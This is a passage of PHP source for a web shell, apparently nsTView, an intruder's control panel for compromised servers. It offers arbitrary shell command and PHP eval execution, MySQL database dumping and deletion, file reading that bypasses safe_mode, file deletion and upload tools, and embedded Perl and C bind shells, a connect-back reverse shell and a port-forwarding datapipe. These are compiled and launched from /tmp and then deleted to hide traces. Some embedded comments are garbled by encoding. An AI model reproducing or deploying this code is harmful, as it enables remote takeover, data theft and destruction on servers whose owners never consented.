";
###
$f_d = $_GET['f_d'];
if(!isset($f_d)){$f_d=".";}
if($f_d==""){$f_d=".";}
$php_self=$_SERVER['PHP_SELF'];
$delete_table=$_GET['delete_table'];
$tbl=$_GET['tbl'];
$from=$_GET['from'];
$to=$_GET['to'];
$adress=$_POST['adress'];
$port=$_POST['port'];
$login=$_POST['login'];
$pass=$_POST['pass'];
$adress=$_GET['adress'];
$port=$_GET['port'];
$login=$_GET['login'];
$pass=$_GET['pass'];
$conn=$_GET['conn'];
if(!isset($adress)){$adress="localhost";}
if(!isset($login)){$login="root";}
if(!isset($pass)){$pass="";}
if(!isset($port)){$port="3306";}
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
?>
if(!$conn){ ?>
$conn=$_GET['conn'];
$adress=$_GET['adress'];
$port=$_GET['port'];
$login=$_GET['login'];
$pass=$_GET['pass'];
if($conn){
$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("Error: ".mysql_error()." ");
if($serv){$status="Connected. :: Log out ";}else{$status="Disconnected.";}
print "Status: $status "; # #D7FFA8
print "";
print "[db] ";
print "";
$res = mysql_list_dbs($serv);
while ($str=mysql_fetch_row($res)){
print "[DEL] [DUMP] $str[0] ";
$tc++;
}
$baza=$_GET['baza'];
$db=$_GET['db'];
print "[Total db: $tc] ";
if($baza){
print "db: [$db]
";
$result=@mysql_list_tables($db);
while($str=@mysql_fetch_array($result)){
$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
$records=mysql_fetch_array($c);
if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
if($records[0]=="0"){
print "[D] [R] [$records[0]] $str[0] ";
}else{
print "[D] [R] [$records[0]] $str[0] ";
}
mysql_free_result($c);
$total_t++;
}
print "Total tables: $total_t ";
print "";
for($i=0; $i<$s4ot+10; $i++){print " ";}
print " ";
} #end baza
# delete table
if(isset($delete_table)){
mysql_select_db($_GET['db']) or die("".mysql_error()." ");
mysql_query("DROP TABLE IF EXISTS $delete_table") or die("".mysql_error()." ");
print "Table [ $delete_table ] :: Deleted success! ";
print " ";
}
# end of delete table
# delete database
if(isset($_GET['delete_db'])){
mysql_drop_db($_GET['delete_db']) or die("".mysql_error()." ");
print "Database ".$_GET['delete_db']." :: Deleted Success!";
print " ";
}
# end of delete database
# delete row
if(isset($_POST['delete_row'])){
$_POST['delete_row'] = base64_decode($_POST['delete_row']);
mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("".mysql_error()." ");
$del_result = "Deleted Success! ".$_POST['delete_row'];
print " ";
}
# end of delete row
$vn=$_GET['vn'];
print " ";
print "Database: $db => $vn ";
# edit row
if(isset($_POST['edit_row'])){
$edit_row=base64_decode($_POST['edit_row']);
$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("".mysql_error()." ");
print "
";
print " ";
if(!$_POST['makeupdate']){print " ";}
if($_POST['makeupdate']){
if($_POST['upd']=='update'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $iPHP var: \$sql=\"$up_string\"; ";
print " ";
mysql_query($up_string) or die("".mysql_error()." ");
}#end of make update
if($_POST['upd']=='insert'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i".mysql_error()."");
print "PHP var: \$sql=\"$make_insert\"; ";
print " ";
}#end of insert
}#end of update
}
# end of edit row
# insert new line
if($_GET['ins_new_line']){
$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error()." ");
print "
Insert new line in $tbl table ";
print "";
while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
foreach ($new_line as $key =>$next) {
$buff .= "$next ";
}
$expl=explode(" ",$buff);
$buff2 .= $expl[0]." ";
print "$expl[0] ($expl[1] )
";
unset($buff);
}
print "
";
if($_POST['mk_ins']){
preg_match_all("/(.*?)\s/i",$buff2,$matches3);
for($i=0; $i".mysql_error()."");
print "PHP var: \$sql=\"$make_insert\"; ";
print " ";
}#end of mk ins
}#end of ins new line
if(isset($_GET['rename_table'])){
$rename_table=$_GET['rename_table'];
print " Rename $rename_table to
";
if(isset($_POST['new_name'])){
mysql_select_db($db) or die("".mysql_error()." ");
mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error()." ");
print "Table $rename_table renamed to ".$_POST['new_name']." ";
print " ";
}
}#end of rename
# dump table
if($_GET['dump']){
if(!is_writable($f_d)){die("This folder $f_d isnt writable! Cannot make dump.
You can change temp folder for dump file in your browser!
Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
Then press enter
");}
mysql_select_db($db) or die("".mysql_error()." ");
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# nsTView.php v$ver
# Web: http://nst.void.ru
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db ) Table ( $tbl )
# --- eof ---
");
$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error()." ");
$row = mysql_fetch_row($que);
fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$que = mysql_query("SELECT * FROM `$tbl`");
if(mysql_num_rows($que)>0){
while($row = mysql_fetch_assoc($que)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
fwrite($fp, $sql);
}
}
fclose($fp);
print " ";
}#end of dump
# db dump
if($_GET['dump_db']){
$c=mysql_num_rows(mysql_list_tables($db));
if($c>=1){
print " Dump database $db ";
}else{
print "Cannot dump database. No tables exists in $db db. ";
die;
}
if(sizeof($tabs)==0){
$res = mysql_query("SHOW TABLES FROM $db");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_row($res)){
$tabs[] .= $row[0];
}
}
}
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# nsTView.php v$ver
# Web: http://nst.void.ru
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db )
# --- eof ---
");
foreach($tabs as $tab) {
fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
$res = mysql_query("SHOW CREATE TABLE `$tab`");
$row = mysql_fetch_row($res);
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$res = mysql_query("SELECT * FROM `$tab`");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_assoc($res)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = join("', '", $values);
$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
fwrite($fp, $sql);
}}
fwrite($fp, "\r\n\r\n\r\n");
}
fclose($fp);
print " ";
}#end of db dump
$vnutr=$_GET['vnutr'];
$tbl=$_GET['tbl'];
if($vnutr and !$_GET['ins_new_line']){
print "";
$vn=$_GET['vn'];
$from=$_GET['from'];
$to=$_GET['to'];
$from=$_GET['from'];
$to=$_GET['to'];
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
$query = "SELECT * FROM $vn LIMIT $from,$to";
$result = mysql_query($query);
$result1= mysql_query($query);
print $del_result;
print "";
} #end vnutr
print "
";
} # end $conn
### end of sql
print " ";
print $copyr;
die;
}
@$p=$_GET['p'];
if(@$_GET['p']=="selfremover"){
print "";
if(@$_GET['sh311']=="1"){echo "cmd pwd:
";
chdir($d);
echo getcwd()."
Fast cmd: ";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
Insert pwd
";
if(@$_POST['sh3']){
$sh3=$_POST['sh3'];
echo "";
print `$sh3`;
echo " ";
}
}
if(@$_GET['sh311']=="2"){
echo "cmd
pwd:
";
chdir($d);
echo getcwd()."
Fast cmd: ";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
Insert pwd
";
if(@$_POST['sh3']){
$sh3=$_POST['sh3'];
echo ""; print `$sh3`; echo " ";}
echo $copyr;
exit;}
if(@$_GET['delfl']){
@$delfolder=$_GET['delfolder'];
echo "DELETE FOLDER: ".@$_GET['delfolder']."
(All files must be writable)
Yes || No
";
echo $copyr;
exit;
}
$mkdir=$_GET['mkdir'];
if($mkdir){
print "Create Folder in $d :
New folder name:
";
if($_POST['dir_n']){
mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
print "Directory created success! ";
}
print $copyr;
die;
}
$mkfile=$_GET['mkfile'];
if($mkfile){
print "Create file in $d :
File name:
(example: hello.txt , hello.php)
";
if($_POST['file_n']){
$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
fwrite($fp,"");
print "File created success! ";
}
print $copyr;
die;
}
$ps_table=$_GET['ps_table'];
if($ps_table){
if($_POST['kill_p']){
exec("kill -9 ".$_POST['kill_p']);
}
$str=`ps aux`;
# You can put here preg_match_all for other distrib/os
preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
print "PS Table :: Fast kill program
(p.s: Tested on Linux slackware 10.0)
";
print " ";
unset($str);
print $copyr;
die;
}#end of ps table
$read_file_safe_mode=$_GET['read_file_safe_mode'];
if($read_file_safe_mode){
if(!isset($_POST['l'])){$_POST['l']="root";}
print "
Read file content using MySQL - when safe_mode , open_basedir is ON
(example: /etc/hosts)
";
if($_POST['read_file']){
$read_file=$_POST['read_file'];
@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error()." ");
mysql_create_db("tmp_bd_file") or die("".mysql_error()." ");
mysql_select_db("tmp_bd_file") or die("".mysql_error()." ");
mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error()." ");
mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
$query = "SELECT * FROM tmp_file";
$result = mysql_query($query) or die("".mysql_error()." ");
print "File content : ";
for($i=0;$i$col_value) {
print htmlspecialchars($col_value)." ";}}
mysql_free_result($result);
mysql_drop_db("tmp_bd_file") or die("".mysql_error()." ");
}
print $copyr;
die;
}#end of read_file_safe_mode
# sys
$wich_f=$_GET['wich_f'];
$delete=$_GET['delete'];
$del_f=$_GET['del_f'];
$chmod=$_GET['chmod'];
$ccopy_to=$_GET['ccopy_to'];
# delete
if(@$_GET['del_f']){
if(!isset($delete)){
print "Delete this file?
$d/$wich_f
Yes / No
";}
if($delete==1){
unlink($d."/".$del_f);
print "File: $d/$del_f DELETED!
# BACK
";
}
echo $copyr;
exit;
}
# copy to
if($ccopy_to){
$wich_f=$_POST['wich_f'];
$to_f=$_POST['to_f'];
print "Copy file:
$d/$ccopy_to
File:
To:
";
if($to_f){
@copy($wich_f,$to_f) or die("Cannot copy!!! maybe folder is not writable ");
print "Copy success!!! ";
}
echo $copyr;
exit;
}
# chmod
if(@$_GET['chmod']){
$perms = @fileperms($d."/".$wich_f);
print "CHMOD file $d/$wich_f
This file chmod is ";
print perm($perms);
print "
";
$chmd=<<
HTML;
print "".$chmd."
$d/$wich_f
";
$t_total=$_POST['t_total'];
if($t_total){
chmod($d."/".$wich_f,$t_total);
print "Now chmod is $t_total ";
print "# BACK ";
}
echo $copyr;
exit;
}
# rename
if(@$_GET['rename']){
print "RENAME $d/$wich_f ?
RENAME $wich_f TO
";
@$rto=$_POST['rto'];
if($rto){
$fr1=$d."/".$wich_f;
$fr1=str_replace("//","/",$fr1);
$to1=$d."/".$rto;
$to1=str_replace("//","/",$to1);
rename($fr1,$to1);
print "File $wich_f Renamed to $rto ";
echo " ";
}
echo $copyr;
exit;
}
if(@$_GET['deldir']){
@$dir=$_GET['dir'];
function deldir($dir)
{
$handle = @opendir($dir);
while (false!==($ff = @readdir($handle))){
if($ff != "." && $ff != ".."){
if(@is_dir("$dir/$ff")){
deldir("$dir/$ff");
}else{
@unlink("$dir/$ff");
}}}
@closedir($handle);
if(@rmdir($dir)){
@$success = true;}
return @$success;
}
$dir=@$dir;
deldir($dir);
$rback=$_GET['rback'];
@$rback=explode("/",$rback);
$crb=count($rback);
for($i=0; $i<$crb-1; $i++){
@$x.=$rback[$i]."/";
}
echo " ";
echo $copyr;
exit;}
if(@$_GET['t']=="tools"){
# unix
if($os=="unix"){
print "
P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.
";
}#end of unix
if($_POST['perl_bd']){
$port=$_POST['port'];
$perl_bd_scp = "
use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
close X;}}";
if(is_writable("/tmp")){
$fp=fopen("/tmp/nst_perl_bd.pl","w");
fwrite($fp,"$perl_bd_scp");
passthru("nohup perl /tmp/nst_perl_bd.pl &");
unlink("/tmp/nst_perl_bd.pl");
}else{
if(is_writable(".")){
mkdir(".nst_bd_tmp");
$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
fwrite($fp,"$perl_bd_scp");
passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
unlink(".nst_bd_tmp/nst_perl_bd.pl");
rmdir(".nst_bd_tmp");
}
}
$show_ps="1";
}#end of start perl_bd
if($_POST['perl_proxy']){
$port=$_POST['port'];
$perl_proxy_scp = "";
if(is_writable("/tmp")){
$fp=fopen("/tmp/nst_perl_proxy.pl","w");
fwrite($fp,base64_decode($perl_proxy_scp));
passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
unlink("/tmp/nst_perl_proxy.pl");
}else{
if(is_writable(".")){
mkdir(".nst_proxy_tmp");
$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
fwrite($fp,base64_decode($perl_proxy_scp));
passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
rmdir(".nst_proxy_tmp");
}
}
$show_ps="1";
}#end of start perl_proxy
if($_POST['c_bd']){
$port=$_POST['port'];
$c_bd_scp = "#define PORT $port
#include
#include
#include
#include
#include
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main ()
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl(\"/bin/sh\",\"sh\",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
";
if(is_writable("/tmp")){
$fp=fopen("/tmp/nst_c_bd.c","w");
fwrite($fp,"$c_bd_scp");
passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
passthru("nohup /tmp/nst_bd &");
unlink("/tmp/nst_c_bd.c");
unlink("/tmp/nst_bd");
}else{
if(is_writable(".")){
mkdir(".nst_bd_tmp");
$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
fwrite($fp,"$c_bd_scp");
passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
passthru("nohup .nst_bd_tmp/nst_bd &");
unlink(".nst_bd_tmp/nst_bd");
unlink(".nst_bd_tmp/nst_c_bd.c");
rmdir(".nst_bd_tmp");
}
}
$show_ps="1";
}#end of c bd
if($_POST['bc_c']){ # nc -l -p 4500
$port_c = $_POST['port_c'];
$ip=$_POST['ip'];
$bc_c_scp = "#include
#include
#include
#include
#include
#include
#include
int fd, sock;
int port = $port_c;
struct sockaddr_in addr;
char mesg[] = \"::Connect-Back Backdoor:: CMD: \";
char shell[] = \"/bin/sh\";
int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, \" %s \", argv[0]);
exit(0); }
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);
connect(fd, (struct sockaddr*)&addr, sizeof(addr));
send(fd, mesg, sizeof(mesg), 0);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(shell, \"in.telnetd\", 0);
close(fd);
return 1;
}
";
if(is_writable("/tmp")){
if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
$fp=fopen("/tmp/nst_c_bc_c.c","w");
$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
fwrite($fp,"$bc_c_scp");
passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
passthru("nohup /tmp/nst_bc_c $ip &");
unlink("/tmp/nst_bc_c");
unlink("/tmp/nst_bc_c.c");
}else{
if(is_writable(".")){
mkdir(".nst_bc_c_tmp");
$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
fwrite($fp,"$bc_c_scp");
passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
unlink(".nst_bc_c_tmp/nst_bc_c.c");
unlink(".nst_bc_c_tmp/nst_bc_c");
rmdir(".nst_bc_c_tmp");
}
}
$show_ps="1";
}#end of back connect C
if($_POST['datapipe_pl']){
$port_2=$_POST['port_2'];
$port_3=$_POST['port_3'];
$ip=$_POST['ip'];
$datapipe_pl = "
#!/usr/bin/perl
# coded by CuTTer (rus hacker)
use IO::Socket;
use POSIX;
\$localport=$port_2;
\$host=\"$ip\";
\$port=$port_3;
\$daemon=1;
\$DIR = undef;
## Âûâîäèòü ëî?ñîáûòè?(1-äà, 0-íå?
\$log=0;
\$| = 1;
if (\$daemon){
print \"3anycKaeM daemon\n\";
\$pid = fork;
exit if \$pid;
die \"Couldn't fork: \$!\" unless defined(\$pid);
POSIX::setsid() or die \"Can't start a new session: \$!\";
}
%o = ('port' => \$localport,
'toport' => \$port,
'tohost' => \$host);
\$ah = IO::Socket::INET->new(
'LocalPort' => \$localport,
'Reuse' => 1,
'Listen' => 10)
|| die \"Íåëü? îòêðûò?ñîêå?äëÿ ñîåäèíåíèé: \$!\";
print \"Íà÷èíàåì âûïîëíåí? öèêë?\n\" if \$log;
\$SIG{'CHLD'} = 'IGNORE';
\$num = 0;
while (1) {
\$ch = \$ah->accept();
if (!\$ch) {
print STDERR \"Ïðåðâàíî âûïîëåíè?accept: \$!\n\";
next;
}
printf(\"Íîâû?êëèåíò: host %s, port %s.\n\",
\$ch->peerhost(), \$ch->peerport()) if \$log;
++\$num;
\$pid = fork();
if (!defined(\$pid)) {
print STDERR \"Íåâîçìîæíî âûïîëíèò?fork: \$!\n\";
} elsif (\$pid == 0) {
## Íîâû?ïðîöåñ?
\$ah->close();
Run(\%o, \$ch, \$num);
} else {
print \"Parent: Fork ïðîøåë óñïåøí? çàêðûâàå?ñîêå?\n\" if \$log;
\$ch->close();
}
}
sub Run {
my(\$o, \$ch, \$num) = @_;
my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
'PeerPort' => \$o->{'toport'});
print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log;
if (!\$th) {
printf STDERR (\"Child: Ïðåðâà?ðåäèðåêò íà %s, ïîðò %s.\n\",
\$o->{'tohost'}, \$o->{'toport'});
exit 0;
}
my \$fh;
if (\$o->{'dir'}) {
\$fh = Symbol::gensym();
open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
or die \"Child: Ïðåðâàíî ñîçäàíèå ëî?ôàéë?\$o->{'dir'}/tunnel\$num.log: \$!\";
}
\$ch->autoflush();
\$th->autoflush();
while (\$ch || \$th) {
print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log;
my \$rin = \"\";
vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
vec(\$rin, fileno(\$th), 1) = 1 if \$th;
my(\$rout, \$eout);
select(\$rout = \$rin, undef, \$eout = \$rin, 120);
if (!\$rout && !\$eout) {
print STDERR \"Child: Îøèáêà Timeout.\n\";
}
my \$cbuffer = \"\";
my \$tbuffer = \"\";
if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
print \"Child: Æäåì äàííûõ îò êëèåíò?\n\" if \$log;
my \$result = sysread(\$ch, \$tbuffer, 1024);
if (!defined(\$result)) {
print STDERR \"Child: Îøèáêà ïð?ñ÷èòûâàíèè äàííûõ êëèåíò? \$!\n\";
exit 0;
}
if (\$result == 0) {
print \"Child: Êëèåíò îòñîåäèíèë?.\n\" if \$log;
exit 0;
}
print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
}
if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) {
print \"Child: Æäåì äàííûõ.\n\" if \$log;
my \$result = sysread(\$th, \$cbuffer, 1024);
if (!defined(\$result)) {
print STDERR \"Child: Íåâîçìîæíî ñ÷èòàò?äàííûå: \$!\n\";
exit 0;
}
if (\$result == 0) {
print \"Child: Ïðîèçîøë?îòñîåäèíåíèå.\n\" if \$log;
exit 0;
}
print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
}
if (\$fh && \$tbuffer) {
(print \$fh \$tbuffer);
}
while (my \$len = length(\$tbuffer)) {
print \"Child: Îòïðàâ?åì \$len áàéò.\n\" if \$log;
my \$res = syswrite(\$th, \$tbuffer, \$len);
print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log;
if (\$res > 0) {
\$tbuffer = substr(\$tbuffer, \$res);
} else {
print STDERR \"Child: Íåâîçìîæíî îòïðàâèò?äàííûå: \$!\n\";
}
}
while (my \$len = length(\$cbuffer)) {
print \"Child: Îòïðàâ?åì \$len áàéò êëèåíò?\n\" if \$log;
my \$res = syswrite(\$ch, \$cbuffer, \$len);
print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log;
if (\$res > 0) {
\$cbuffer = substr(\$cbuffer, \$res);
} else {
print STDERR \"Child: Íåâîçìîæíî îòïðàâèò?äàííûå: \$!\n\";
}
}
}
}
";
if(is_writable("/tmp")){
$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
unlink("/tmp/nst_perl_datapipe.pl");
}else{
if(is_writable(".")){
mkdir(".nst_datapipe_tmp");
$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
fwrite($fp,"$datapipe_pl");
passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
rmdir(".nst_datapipe_tmp");
}
}
$show_ps="1";
}#end of datapipe perl
if($show_ps=="1"){
print "[ps ux] ";
print "";
passthru("ps ux");
print " ";
}
echo "md5:
md5 online encoder/decoder (brutforce) (php) - [DOWNLOAD ]
";
@$md5=@$_POST['md5'];
if(@$_POST['md5']){ echo "md5:".md5($md5)." ";}
echo "
base64 e/d: ";
if(@$_POST['base64']){
@$base64=$_POST['base64'];
echo "
Encode: ".base64_encode($base64)."
Decode: ".base64_decode($base64)." ";}
echo "
DES:
John The Ripper [Web ] ";
if(@$_POST['des']){
@$des=@$_POST['des'];
echo "Des: ".crypt($des)." ";}
print "
eval:
(example: print \"Hello World\";)
?>
";
function eval_sl($editf){
if(get_magic_quotes_gpc()==1){
$editf=stripslashes($editf);
}
return $editf;
}
if($_POST['eval']){
print "RESULT: ";
eval(eval_sl($_POST['eval']));
print " ";
print "PHP: \r\n\r\n";
print "\r\n";
print " ";
print htmlspecialchars(eval_sl(($_POST['eval'])));
print " ";
print "?>\r\n\r\n ";
}
echo $copyr;
exit;}
if(@$_GET['replace']=="1"){
$ip=@$_SERVER['REMOTE_ADDR'];
$d=$_GET['d'];
$e=$_GET['e'];
@$de=$d."/".$e;
$de=str_replace("//","/",$de);
$e=@$e;
echo "[Delete ] [Edit ] [Filesize to 0 byte ] [Replace text in file ] [Download ] [Rename ] [CHMOD ] [Copy ] ";
echo "
Replace tool:
(You can replace any text)
File: $de
1. Your ip.
2. microsoft.com ip :)
Replace this by this
";
if(@$_POST['doit']){
@$thisX=$_POST['thisX'];
@$bythis=$_POST['bythis'];
@$e=$_GET['e'];
$filename="$d/$e";
$fd = @fopen ($filename, "r");
$rpl = @fread ($fd, @filesize ($filename));
$re=str_replace("$thisX","$bythis",$rpl);
$x=@fopen("$d/$e","w");
@fwrite($x,"$re");
echo "$thisX Replaced by $bythis
[VIew file ] ";
}
echo $copyr;
exit;}
if(@$_GET['t']=="upload"){
echo "
* Mass upload *
File upload:
New file name:
(if empty, it will be default)
";
if(@$_POST['uploadf']){
$where=$_POST['where'];
$newf=$_POST['newf'];
$where=str_replace("//","/",$where);
if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
$uploadfile = "$where/".$newf;
if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
$uploadfile=str_replace("//","/",$uploadfile);
echo " Uploaded to $uploadfile ";
}else{
echo " Error ";}
}
}
if(@$_GET['t']=="massupload"){
echo "
Mass upload:
";
if(@$_POST['massupload']){
$where=@$_POST['where'];
$uploadfile1 = "$where/".@$_FILES['text1']['name'];
$uploadfile2 = "$where/".@$_FILES['text2']['name'];
$uploadfile3 = "$where/".@$_FILES['text3']['name'];
$uploadfile4 = "$where/".@$_FILES['text4']['name'];
$uploadfile5 = "$where/".@$_FILES['text5']['name'];
$uploadfile6 = "$where/".@$_FILES['text6']['name'];
$uploadfile7 = "$where/".@$_FILES['text7']['name'];
$uploadfile8 = "$where/".@$_FILES['text8']['name'];
$uploadfile9 = "$where/".@$_FILES['text9']['name'];
$uploadfile10 = "$where/".@$_FILES['text10']['name'];
$uploadfile11 = "$where/".@$_FILES['text11']['name'];
$uploadfile12 = "$where/".@$_FILES['text12']['name'];
$uploadfile13 = "$where/".@$_FILES['text13']['name'];
$uploadfile14 = "$where/".@$_FILES['text14']['name'];
$uploadfile15 = "$where/".@$_FILES['text15']['name'];
$uploadfile16 = "$where/".@$_FILES['text16']['name'];
$uploadfile17 = "$where/".@$_FILES['text17']['name'];
$uploadfile18 = "$where/".@$_FILES['text18']['name'];
$uploadfile19 = "$where/".@$_FILES['text19']['name'];
$uploadfile20 = "$where/".@$_FILES['text20']['name'];
if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile1 ";}
if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile2 ";}
if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile3 ";}
if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile4 ";}
if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile5 ";}
if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile6 ";}
if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile7 ";}
if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile8 ";}
if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
$where=str_replace("\\\\","\\",$where);
echo "Uploaded to $uploadfile9 ";}
if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
$where=str_replace("\\\\","\\",$where);
